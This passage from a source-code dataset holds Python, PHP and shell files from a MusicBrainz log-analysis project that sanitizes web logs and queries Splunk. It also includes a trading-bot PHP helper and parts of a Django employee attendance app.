error\n\n def addChild(self, child):\n #print(\"{} appending {}\".format(self, child));\n if child not in self.__children:\n self.__children.append(child)\n child.setParent(self)\n\n def getChildren(self):\n return self.__children\n\n def setParent(self, parent):\n self.__parent = parent\n\n def rmParent(self):\n self.__parent = None\n\n def getParent(self):\n return self.__parent\n\n def __str__(self):\n return '<>{}-{}'.format(self.__head, self.__tail)\n\n def nodeStr(self, level = 0):\n string = \"{}{}. {} -> {}\\n\".format(\"\\t\" * level, level, str(self), len(self.__children))\n\n for c in self.__children:\n string += c.nodeStr(level + 1) + \"\\n\"\n\n return string[:-1]\n\n def __eq__(self, other):\n return str(self) == str(other)\n #return self.__symbol == other.getSymbol()\n" }, { "alpha_fraction": 0.6151723861694336, "alphanum_fraction": 0.6179310083389282, "avg_line_length": 24, "blob_id": "7495d5534fbf020380a6a0cceda517a640ac4b3d", "content_id": "cd2f546b155662e49d3845cd34bde248ddbd50d1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 725, "license_type": "no_license", "max_line_length": 101, "num_lines": 29, "path": "/web/php/gen_func.php", "repo_name": "rcshadman/TradeBot-1", "src_encoding": "UTF-8", "text": "<?php // functions that gets used by all php scripts\n\nfunction getJSONstr($url, $headers = \"\", $method = \"GET\"){\n $opts = array('http' =>\n array(\n 'method' => $method,\n 'timeout' => 10,\n 'header' => $headers\n )\n );\n\n $context = stream_context_create($opts);\n $jsonStr = file_get_contents($url, false, $context);\n return $jsonStr;\n}\n\nfunction getJSON($url, $headers = \"\"){\n return json_decode(getJSONstr($url, $headers), true);\n}\n\nfunction handlingErr($msg){\n throw new Exception(\"\\n{$_GET['platform']}/{$_GET['reqType']}_req.php\\nHandling unknown $msg\\n\");\n}\n\nfunction invalidErr($msg){\n throw new Exception(\"\\nplatform:{$_GET['platform']}\\tcmd:{$_GET['cmd']}\\nHandling invalid $msg\\n\");\n}\n\n?>\n" } ]
7
metabrainz/musicbrainz-server-log-analysis
https://github.com/metabrainz/musicbrainz-server-log-analysis
c469619c448dafe9b34ca89899da5137812fc3b4
726ece0fd9d26afd463aec93b0fade3a8208bd88
85df87bc47957889173e1e1d20743053f20c0bea
refs/heads/master
2021-01-10T21:04:25.297236
2012-09-28T17:46:56
2012-09-28T17:46:56
4,550,986
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.49238890409469604, "alphanum_fraction": 0.4974220395088196, "avg_line_length": 37.40565872192383, "blob_id": "a77c20fa0bc73fa8ddc3646d3aec3266f21ec2f8", "content_id": "e2730a2c8d0f6c6da397ddab9375073089cd7975", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8146, "license_type": "no_license", "max_line_length": 144, "num_lines": 212, "path": "/querying/run_queries.py", "repo_name": "metabrainz/musicbrainz-server-log-analysis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n# Copyright (C) 2012 Daniel Bali\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.\n\nimport psycopg2\nimport sys, utils, json, yaml, config\n\nfrom splunklib.client import connect\nfrom splunklib.binding import HTTPError\n\n# Test mode, and YAML files\nTEST_MODE = False\nQUERIES = 'queries.yml'\nQUERIES_TEST = 'queries_test.yml'\nENTITY_TABLES = 'entity_tables.yml'\n\ndef look_up_mbid_list(mbid_list, mbid_dict, query_template, entity_tables, table_key, cursor):\n for entity_dict in entity_tables['entity_tables']:\n entity = entity_dict.values()[0]\n \n if mbid_list:\n # Look up id in table with the given key (entity or redirect)\n # Look up name in table specified by name_table\n lookup_query = query_template % (entity[table_key], entity['name_table'], \"%s\")\n \n try:\n cursor.execute(lookup_query, (tuple(mbid_list),))\n except Exception, e:\n print \"Query was: %s\" % lookup_query\n print e.pgerror\n sys.exit(1)\n \n # 0: mbid, 1: name\n for record in cursor.fetchall():\n mbid_dict[record[0]] = {\n 'name': record[1],\n 'entity': entity['name']\n }\n mbid_list.remove(record[0])\n\ndef main():\n\n # Parse the YAML file that contains queries\n if TEST_MODE:\n file = open(QUERIES_TEST)\n else:\n file = open(QUERIES)\n queries = yaml.load(file.read())\n \n # Parse YAML file for entity name and redirect tables\n file = open(ENTITY_TABLES)\n entity_tables = yaml.load(file.read())\n \n # Connect to splunk\n try:\n splunk_conn = connect(**config.SPLUNK_CREDENTIALS)\n except HTTPError, e:\n print \"Splunk error: %s\" % str(e.message)\n sys.exit(1)\n \n # Connect to the db\n try:\n db_conn = psycopg2.connect(config.DB_CREDENTIALS)\n db_cursor = db_conn.cursor()\n except psycopg2.OperationalError, e:\n print e\n sys.exit(1)\n \n # Loop through each category\n for category_dict in queries['categories']:\n category = category_dict.values()[0]\n \n # Loop through each query in a category\n for query_dict in category['queries']:\n splunk_query = query_dict.values()[0]\n \n # Get Splunk query response\n try:\n response = splunk_conn.jobs.create(splunk_query['query'], exec_mode='oneshot', output_mode='json', count=0, max_count=5000)\n except HTTPError, e:\n print \"Splunk error: %s\" % str(e.message)\n sys.exit(1)\n \n # Load JSON \n print \"Processing query: %s: %s\" % (category['name'], splunk_query['name'])\n try:\n data_json = json.loads(str(response))\n except ValueError, e:\n print \"Warning: no results returned for query '%s'\" % splunk_query['name']\n data_json = [{'message': 'No results found'}]\n \n # Try to find mbids in the response\n mbid_list = []\n for line in data_json:\n if 'mbid' in line:\n mbid_list.append(line['mbid'])\n if mbid_list:\n # Form query to find names for mbids\n entity_query_template = \"\"\"\n select x.gid, x_n.name \n from %s x, %s x_n \n where x.gid in %s \n and x.name = x_n.id;\n \"\"\"\n \n redirect_query_template = \"\"\"\n select x_r.gid, x_n.name \n from %s x_r, %s x_n \n where x_r.gid in %s\n and x_r.new_id = x_n.id\n \"\"\"\n \n # Store name and entity type for mbids\n mbid_dict = {}\n look_up_mbid_list(mbid_list, mbid_dict, entity_query_template, entity_tables, 'entity_table', db_cursor)\n \n # Try to look up tables/ids with redirect tables \n # for mbids that weren't found in \"normal\" tables\n look_up_mbid_list(mbid_list, mbid_dict, redirect_query_template, entity_tables, 'redirect_table', db_cursor)\n \n # Filter data where it's needed\n if splunk_query.has_key('filter'):\n for filter_dict in splunk_query['filter']:\n filter = filter_dict.values()[0]\n data_json = [line for line in data_json if line[filter['column']] not in filter['values']]\n \n for line in data_json:\n \n # Remove \"private\" key-value pairs\n for key in line.keys():\n if key.startswith('_'):\n line.pop(key)\n \n # Correct percent rounding to maximum 2 decimal places\n if 'percent' in line:\n line['percent'] = str(round(float(line['percent']), 2))\n \n # Store names instead of mbids in JSON\n if 'mbid' in line:\n if line['mbid'] in mbid_dict:\n # Create a link to the entity here\n link = '<a href=\"/%s/%s\">%s</a>'\n line['name'] = link % (mbid_dict[line['mbid']]['entity'], line['mbid'], mbid_dict[line['mbid']]['name'].decode('utf-8'))\n else:\n # If name was not found, display the mbid\n line['name'] = '[%s]' % line['mbid']\n # Do not display mbids\n del line['mbid']\n \n # Array containing dumped json data\n data_dict = {} \n \n # If the report is grouped, create multiple reports\n if splunk_query['is_grouped']:\n for line in data_json:\n if (data_dict.has_key(line['urlGroup'])):\n data_dict[line['urlGroup']].append(line)\n else:\n data_dict[line['urlGroup']] = [line]\n del line['urlGroup']\n else:\n data_dict[splunk_query['name']] = data_json\n \n # Create a wrapper for JSON data\n data_wrap = {}\n for key, data in data_dict.iteritems():\n data = {\n 'data' : data, \n 'display' : splunk_query['display']\n }\n data = json.dumps(data)\n data_wrap[key] = data\n \n try:\n for name, data in data_wrap.iteritems():\n # Store results in db, commit\n db_cursor.execute(\"INSERT INTO statistics.log_statistic (name, category, data) VALUES (%s, %s, %s);\",\n (name, category['name'], data))\n \n except Exception, e:\n # Rollback\n db_conn.rollback()\n \n # Print error, return exit code 1\n print e.pgerror\n sys.exit(1)\n \n # Close connection\n db_conn.commit()\n db_cursor.close()\n db_conn.close()\n \n # Exit code 0\n sys.exit(0)\n \n\nif __name__ == '__main__':\n main()\n " }, { "alpha_fraction": 0.5529200434684753, "alphanum_fraction": 0.6462029218673706, "avg_line_length": 58.03529357910156, "blob_id": "af8917ca46c19359dd17cff89614e266a454c87c", "content_id": "5dcd232c58b9ab95169852c31ac6737dfc77cfea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5017, "license_type": "no_license", "max_line_length": 703, "num_lines": 85, "path": "/sanitizing/log_sanitizer_test.py", "repo_name": "metabrainz/musicbrainz-server-log-analysis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n# Copyright (C) 2012 Daniel Bali\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.\n\nimport random\nimport unittest\nfrom StringIO import StringIO\nfrom string import Template\n\nclass TestSanitizer(unittest.TestCase):\n # List of input data to use for testing\n input_list = []\n\n def setUp(self):\n # Create input data templates\n template = {\n 'username' : [\n Template(\"\"\"1000000000.000 127.0.0.1 \"GET /user/${username}/edits/open?page=1 HTTP/1.1\" 200 9202 z=- up=10.1.1.20:80 ms=2.956 ums=2.956 ol=- h=musicbrainz.org \"\"\"),\n Template(\"\"\"1000000000.000 127.0.0.1 \"GET /search/edits?auto_edit_filter=&order=asc&negation=0&combinator=and&conditions.0.field=vote&conditions.0.operator=%3D&conditions.0.voter_id=1234567890&conditions.0.args=no&conditions.1.field=artist&conditions.1.operator=subscribed&conditions.1.name=&conditions.1.=&conditions.1.args.0=&conditions.1.user_id=1234567890&conditions.2.field=status&conditions.2.operator=%3D&conditions.2.args=1&conditions.3.field=editor&conditions.3.operator=!%3D&conditions.3.name=${username}&conditions.3.=&conditions.3.args.0=1234567890&field=Please+choose+a+condition HTTP/1.1\" 200 35410 z=9.25 up=10.1.1.17:80 ms=8.376 ums=8.220 ol=- h=musicbrainz.org \"\"\")\n ],\n 'userid' : [\n Template(\"\"\"1000000000.000 127.0.0.1 \"GET /show/user/?userid=${userid} HTTP/1.0\" 404 10880 z=- up=10.1.1.23:80 ms=0.793 ums=0.793 ol=- h=musicbrainz.org \"\"\"),\n Template(\"\"\"1000000000.000 127.0.0.1 \"GET /mod/search/pre/voted.html?userid=${userid} HTTP/1.0\" 404 10906 z=- up=10.1.1.17:80 ms=0.859 ums=0.859 ol=- h=musicbrainz.org \"\"\"),\n Template(\"\"\"1000000000.000 127.0.0.1 \"GET /verify-email?email=not_a_real_email%40not_a_real_website.com&chk=0&time=0&userid=${userid} HTTP/1.1\" 200 2949 z=4.02 up=10.1.1.23:80 ms=0.810 ums=0.810 ol=- h=musicbrainz.org \"\"\"),\n Template(\"\"\"1000000000.000 127.0.0.1 \"GET /search/edits?auto_edit_filter=&order=asc&negation=0&combinator=and&conditions.0.field=vote&conditions.0.operator=%3D&conditions.0.voter_id=${userid}&conditions.0.args=no&conditions.1.field=artist&conditions.1.operator=subscribed&conditions.1.name=&conditions.1.=&conditions.1.args.0=&conditions.1.user_id=${userid}&conditions.2.field=status&conditions.2.operator=%3D&conditions.2.args=1&conditions.3.field=editor&conditions.3.operator=!%3D&conditions.3.name=not_a_real_username&conditions.3.=&conditions.3.args.0=${userid}&field=Please+choose+a+condition HTTP/1.1\" 200 35410 z=9.25 up=10.1.1.17:80 ms=8.376 ums=8.220 ol=- h=musicbrainz.org \"\"\")\n ],\n 'email' : [\n Template(\"\"\"1000000000.000 127.0.0.1 \"GET /verify-email?email=${email}&chk=0&time=0&userid=1234567890 HTTP/1.1\" 200 2949 z=4.02 up=10.1.1.23:80 ms=0.810 ums=0.810 ol=- h=musicbrainz.org \"\"\")\n ]\n }\n\n # Define sample data\n sample_data = {\n 'username' : ['bob123', 'alice456', '%3cplaintext%3e'],\n 'userid' : ['012345', '456789', '789abc'],\n 'email' : ['lorem%40ipsum.com', 'dolor%40sit.co.uk', 'amet%40consectetuer.museum']\n }\n\n # Populate input data list using templates and sample data\n # Store the sensitive part for each case to make assertion easier\n for k, v in template.iteritems():\n for i in range(100):\n tpl = random.choice(v)\n tpl_data = random.choice(sample_data[k])\n input_dict = {\n 'line' : tpl.substitute({k : tpl_data}),\n 'sensitive' : tpl_data}\n self.input_list.append(input_dict)\n\n # Log sanitizer test\n def test_sanitizer(self):\n import log_sanitizer\n\n for i in range(len(self.input_list)):\n # stdin, containing 1 line of input\n stdin = StringIO(self.input_list[i]['line'])\n\n # stdout for log_sanitizer.main()\n stdout = StringIO()\n\n # Sanitize test data\n log_sanitizer.main(stdin=stdin, stdout=stdout)\n\n # Get output\n output = stdout.getvalue().strip()\n\n # Check whether sensitive data was replaced\n self.assertEqual(output.find(self.input_list[i]['sensitive']), -1)\n\nif __name__ == '__main__':\n unittest.main()" }, { "alpha_fraction": 0.7158836722373962, "alphanum_fraction": 0.718120813369751, "avg_line_length": 40.9375, "blob_id": "5939d6eea6c5cbf081b78c42967cd9518846426a", "content_id": "c4302495aebf92130b51293317efca4f59ef9bc4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1341, "license_type": "no_license", "max_line_length": 178, "num_lines": 32, "path": "/README.md", "repo_name": "metabrainz/musicbrainz-server-log-analysis", "src_encoding": "UTF-8", "text": "MusicBrainz-server-log-analysis\n A repository for my Google Summer of Code project. A short description for each important file follows:\n\nadmin/\n\n bin/push_to_splunk.sh\n Shell script, that pushes sanitized logs to splunk. Written by Robert Kaye.\n \nquerying/\n\n config_default.py\n Default configurations/credentials for the database and splunk.\n \n entity_tables.yml\n YAML file that stores entity (artist, release-group, etc.) table names, the corresponding name tables, and redirect tables.\n \n queries.yml\n YAML file that stores queries to run on Splunk, with additional metadata, that we use for processing and display\n \n queries_test.yml\n The same as the queries file, except the queries are limited to a very small subset of data, so the querying runs much faster. This is used for testing purposes.\n \n run_queries.py\n The actual querying script. It parses the YAML file that stores queries, then runs them on the Splunk server. After processing the results, it stores them in the database\n\nsanitizing/\n\n log_sanitizer.py\n Sanitizes logs, changing any IP addresses or sensitive data. The sensitive parts are hashed with SHA-1, then converted to base64 for brevity.\n\n log_sanitizer_test.py\n Tests the results of log_sanitizer.py" }, { "alpha_fraction": 0.5252016186714172, "alphanum_fraction": 0.5347782373428345, "avg_line_length": 32.62711715698242, "blob_id": "8e7acb9d635470147afc858fe0bc9552c920a849", "content_id": "856fee98d73e0efa11be1aba4d64e4c96ef7af6a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3968, "license_type": "no_license", "max_line_length": 91, "num_lines": 118, "path": "/sanitizing/log_sanitizer.py", "repo_name": "metabrainz/musicbrainz-server-log-analysis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n# Copyright (C) 2012 Daniel Bali\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.\n\nimport sys, getopt, re, hashlib, base64\nfrom salts import salt\n\n# List containing dicts of regexes that find sensitive data, \n# and field names that refer to regex fields and salts\nregex = [{'exp': '/user/(?P<username>[^\\? /]+)', \n 'field' : 'username'},\n {'exp': '(\\?|&)email=(?P<email>[^ &]+)', \n 'field' : 'email'},\n\t\t # In one special case the verify-email line is embedded in a /login?uri=... line\n\t\t # This means that special characters are URL encoded, and we need to match them that way\n {'exp': '(%3F|%3f|%26)email(%3D|%3d)(?P<email>[^ %]+%40[^%]+)', \n 'field' : 'email'},\t\t \n {'exp': '(\\?|&)userid=(?P<userid>\\d+)', \n 'field' : 'userid'},\n\t\t # This is also for the special case\n {'exp': '(%3F|%3f|%26)userid(%3D|%3d)(?P<userid>\\d+)', \n 'field' : 'userid'},\t\t \n {'exp': '(\\?|&)conditions\\.(\\d)+\\.user_id=(?P<userid>\\d+)', \n 'field' : 'userid'},\n {'exp': '(\\?|&)conditions\\.(\\d)+\\.name=(?P<username>[^ /]+)',\n 'field' : 'username'},\n {'exp': '(\\?|&)conditions\\.(\\d)+\\.voter_id=(?P<userid>\\d+)',\n 'field' : 'userid'},\n {'exp': '(\\?|&)conditions\\.(\\d)+\\.args\\.(\\d)+=(?P<userid>\\d+)',\n 'field' : 'userid'}]\n\t\t \nhash_memo = {}\ndef hash(salt, value):\n global hash_memo\n key = salt + value\n if key not in hash_memo:\n hash_memo[key] = do_hash(key)\n return hash_memo[key]\n\ndef do_hash(key):\n return base64.urlsafe_b64encode(hashlib.sha1(key).digest())\n\n# Replace function for re.sub()\n# Takes the named group for the given field\n# Replaces the value with a hash\ndef replace(field):\n def replace_string(matchobj):\n new_hash = hash(salt[field], matchobj.group(field))\n return matchobj.group(0).replace(matchobj.group(field), new_hash)\n return replace_string\n\ndef main(stdin=sys.stdin, stdout=sys.stdout, stderr=sys.stderr):\n # Compile regexes\n for r in regex:\n r['exp'] = re.compile(r['exp'])\n\n # Read input\n for line in stdin:\n # Split line to parts.\n try:\n [\n timestamp,\n ip,\n http_method,\n url,\n http_version,\n http_response,\n page_size,\n z,\n up,\n ms,\n ums,\n ol,\n h\n ] = line.strip().split()\n except ValueError, e:\n sys.stderr(line + \"\\n\")\n\t sys.exit(-1)\n \n # Hash IP\n ip_hash = hash(salt['ip'], ip)\n\n # Match regexes\n for r in regex:\n # Replace the current field's value\n url = r['exp'].sub(replace(r['field']), url)\n\n # Print line\n # Remove some fields that we don't need to decrease size\n # Extra quote needed, because http_version (HTTP/1.1\") was removed\n new_line = '%s %s %s %s\" %s %s %s %s\\n' % (\n timestamp,\n ip_hash,\n http_method,\n url,\n http_response,\n page_size,\n z,\n ums\n )\n stdout.write(new_line)\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.7179487347602844, "alphanum_fraction": 0.7179487347602844, "avg_line_length": 23.14285659790039, "blob_id": "91af8e134b4808a41e8fea8bd9d0c306f6d10466", "content_id": "4099209f570ff35152e14c9b9f2be19d9cb9bd60", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 507, "license_type": "no_license", "max_line_length": 75, "num_lines": 21, "path": "/admin/bin/sanitize_and_index.sh", "repo_name": "metabrainz/musicbrainz-server-log-analysis", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\nINCOMING=~/incoming/*/*\nSANITIZE=~/musicbrainz-server-log-analysis/sanitizing/log_sanitizer.py\nTMP_DIR=/tmp/logs\nSPLUNK=/usr/local/splunk/bin/splunk\n\nmkdir -p $TMP_DIR\n\nfor FILE in `ls $INCOMING`\ndo\n\techo `date`: Sanitizing $FILE\n\tTMP_FILE=$TMP_DIR'/'musicbrainz-access-`date +%Y%m%d`'.log'\n\tpython $SANITIZE < $FILE > $TMP_FILE\n\techo `date`: Importing $FILE to splunk\n\t$SPLUNK add oneshot $TMP_FILE -sourcetype nginx_log -auth import:logloglog\n\trm -f $TMP_FILE\n\trm -f $FILE\ndone\n\nrmdir $TMP_DIR\n" }, { "alpha_fraction": 0.6677908897399902, "alphanum_fraction": 0.6913996338844299, "avg_line_length": 27.238094329833984, "blob_id": "a7233831f20674b6a7dda3dc62bdad4cc0837623", "content_id": "134e907c9e1a5c92bb0fa53ba77273718da838c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 593, "license_type": "no_license", "max_line_length": 76, "num_lines": 21, "path": "/querying/config.default.py", "repo_name": "metabrainz/musicbrainz-server-log-analysis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n# Database connection details\ndb_host = '127.0.0.1'\ndb_port = 5432\ndb_name = 'musicbrainz_db'\ndb_user = 'musicbrainz'\ndb_password = 'musicbrainz'\n\ndb_template = \"host=%s port=%s dbname=%s user=%s\"\nDB_CREDENTIALS = db_template % (db_host, db_port, db_name, db_user)\n\n# Splunk connection credentials\nsplunk_username = 'user'\nsplunk_password = 'password'\nsplunk_host = 'localhost'\nsplunk_scheme = 'https'\nsplunk_port = 8089\n\nSPLUNK_CREDENTIALS = {'username' : splunk_username, 'password' : splunk_password,\n 'host' : splunk_host, 'scheme' : splunk_scheme, 'port' : splunk_port}\n" }, { "alpha_fraction": 0.6910112500190735, "alphanum_fraction": 0.6910112500190735, "avg_line_length": 16.799999237060547, "blob_id": "b43f0bdf0ab5a9fa3c36f6dc245b2d21ce2084c5", "content_id": "97a027f2029f2baa33b46ed3351be4eda821e2ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 178, "license_type": "no_license", "max_line_length": 69, "num_lines": 10, "path": "/admin/bin/push_to_splunk.sh", "repo_name": "metabrainz/musicbrainz-server-log-analysis", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\nHOSTNAME=`hostname`\nSRC=/var/log/nginx/archive/musicbrainz-full-access.log-`date +%Y%m%d`\nDEST=logs@pino.mb:incoming/$HOSTNAME\n\nif [ -e $SRC ]\nthen\n\trsync -z $SRC $DEST\nfi\n" } ]
7
heerapp/first
https://github.com/heerapp/first
c6401edf482459700c0688a7b2700056cc56d74c
66d0709dcca3961f9fd623b6a925160dea51bc6e
211e24d9a018abf0dd08e68fbd91d2fe3add7d50
refs/heads/master
2022-07-12T09:46:50.398742
2019-10-01T10:12:08
2019-10-01T10:12:08
141,520,531
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6293007731437683, "alphanum_fraction": 0.6304106712341309, "avg_line_length": 20.380952835083008, "blob_id": "98bf02e6b5a7bd77b8fb0d8e5760430ba0e936c0", "content_id": "7e51c1cdcb4bf87cd01da457cf849cc8bb2f6933", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 901, "license_type": "no_license", "max_line_length": 67, "num_lines": 42, "path": "/main/forms.py", "repo_name": "heerapp/first", "src_encoding": "UTF-8", "text": "from django import forms\nfrom django.contrib.auth.forms import User\nfrom django.contrib.auth.forms import UserCreationForm\nfrom .models import *\n\n\nclass UserRegisterForm(UserCreationForm):\n email = forms.EmailField\n\n class Meta:\n model = User\n fields = ['username', 'email', 'password1', 'password2']\n\n\nclass UserUpdateForm(forms.ModelForm):\n class Meta:\n model = User\n fields = ['username', 'email']\n\n\nclass EmployeeUpdateForm(forms.ModelForm):\n class Meta:\n model = Employee\n fields = ['address', 'contact', 'type', 'image']\n\n\nclass EntryForm(forms.ModelForm):\n class Meta:\n model = Entry\n exclude = ('user',)\n\n\nclass ExitForm(forms.ModelForm):\n class Meta:\n model = Exit\n exclude = ('user', 'status',)\n\n\nclass LeaveForm(forms.ModelForm):\n class Meta:\n model = Leave\n exclude = ('user',)\n\n\n\n" }, { "alpha_fraction": 0.566439151763916, "alphanum_fraction": 0.5776796340942383, "avg_line_length": 44.29090881347656, "blob_id": "7a922e937bd33415a1b369c26ff3388b81719742", "content_id": "ee3c3605e5d9c427f10c8ed4eb676ed32a27cdfb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2491, "license_type": "no_license", "max_line_length": 185, "num_lines": 55, "path": "/main/migrations/0001_initial.py", "repo_name": "heerapp/first", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.4 on 2019-10-01 08:18\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Leave',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('date', models.DateField()),\n ('reason', models.TextField()),\n ('status', models.CharField(blank=True, default='pending...', max_length=50)),\n ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='Exit',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('end_time', models.DateTimeField(auto_now_add=True)),\n ('status', models.CharField(default='Full Day', max_length=50)),\n ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='Entry',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('start_time', models.DateTimeField(auto_now_add=True)),\n ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='Employee',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('type', models.CharField(choices=[('Web Developer', 'developer'), ('Receptionist', 'receptionist'), ('Manager', 'manager'), ('Designer', 'designer')], max_length=100)),\n ('address', models.CharField(max_length=200)),\n ('contact', models.CharField(max_length=200)),\n ('image', models.ImageField(upload_to='media/')),\n ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n ]\n" }, { "alpha_fraction": 0.6790757179260254, "alphanum_fraction": 0.6874197721481323, "avg_line_length": 27.740739822387695, "blob_id": "9b1d314c44abef163ccef06377198827a1a6b05b", "content_id": "fe6352cab05e10f0943dc0ee92afa1aafd737cf3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1558, "license_type": "no_license", "max_line_length": 78, "num_lines": 54, "path": "/main/models.py", "repo_name": "heerapp/first", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.contrib.auth.models import User\nfrom datetime import datetime\nfrom django.db.models.signals import post_save\n\nSTAFF_CHOICES = [\n ('Web Developer', 'developer'),\n ('Receptionist', 'receptionist'),\n ('Manager', 'manager'),\n ('Designer', 'designer'),\n]\n\n\nclass Employee(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n type = models.CharField(max_length=100, choices=STAFF_CHOICES)\n address = models.CharField(max_length=200)\n contact = models.CharField(max_length=200)\n image = models.ImageField(upload_to=\"media/\")\n\n\ndef create_employee(sender, **kwargs):\n if kwargs['created']:\n Employee.objects.create(user=kwargs['instance'])\n\n\npost_save.connect(create_employee, sender=User)\n\n\nclass Entry(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n start_time = models.DateTimeField(auto_now_add=True, blank=True)\n\n def __str__(self):\n return self.user\n\n\nclass Exit(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n end_time = models.DateTimeField(auto_now_add=True, blank=True)\n status = models.CharField(max_length=50, default=\"Full Day\")\n\n def __str__(self):\n return f\"{self.user}\"\n\n\nclass Leave(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n date = models.DateField()\n reason = models.TextField()\n status = models.CharField(max_length=50, default=\"pending...\", blank=True)\n\n def __str__(self):\n return f\"{self.user}\"\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.6366336345672607, "alphanum_fraction": 0.6366336345672607, "avg_line_length": 44.90909194946289, "blob_id": "9ac3073ad0971417ff5ff774ca5f8a767457e951", "content_id": "084259c915e99a1ac62683962ba4af044106039b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1010, "license_type": "no_license", "max_line_length": 75, "num_lines": 22, "path": "/main/urls.py", "repo_name": "heerapp/first", "src_encoding": "UTF-8", "text": "\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.index,name='index'),\n path('home/', views.home,name='home'),\n path('employ/acer/', views.home, name='home'),\n path('create/', views.create, name='create'),\n path('employee/<slug:name>/', views.employ, name='detail'),\n path('employee/', views.employee, name='employee'),\n path('leave/', views.leave, name='leave'),\n path('entry/', views.entry, name='entry'),\n path('exit/', views.exit, name='exit'),\n path('details/<slug:user>/', views.attendance, name='attendance'),\n path('grant/<int:pk>/', views.grant, name='grant'),\n path('reject/<int:pk>/', views.reject, name='reject'),\n path('profile/', views.profile, name='profile'),\n path('attendance/', views.all_attendence, name='attendances'),\n path('leaves/', views.all_leave, name='leaves'),\n path('employee/<slug:user>/leaves/', views.leaves, name='user-leaves'),\n path('employ/<slug:name>/', views.profiles, name='employs'),\n]" }, { "alpha_fraction": 0.8072289228439331, "alphanum_fraction": 0.8072289228439331, "avg_line_length": 22.714284896850586, "blob_id": "ddaa2a45c7589f5c993ebb21b7c0b3c257e0cfef", "content_id": "6fe4aef3755d334a58e2bbc15d5586b4af0bab17", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 166, "license_type": "no_license", "max_line_length": 32, "num_lines": 7, "path": "/main/admin.py", "repo_name": "heerapp/first", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom .models import 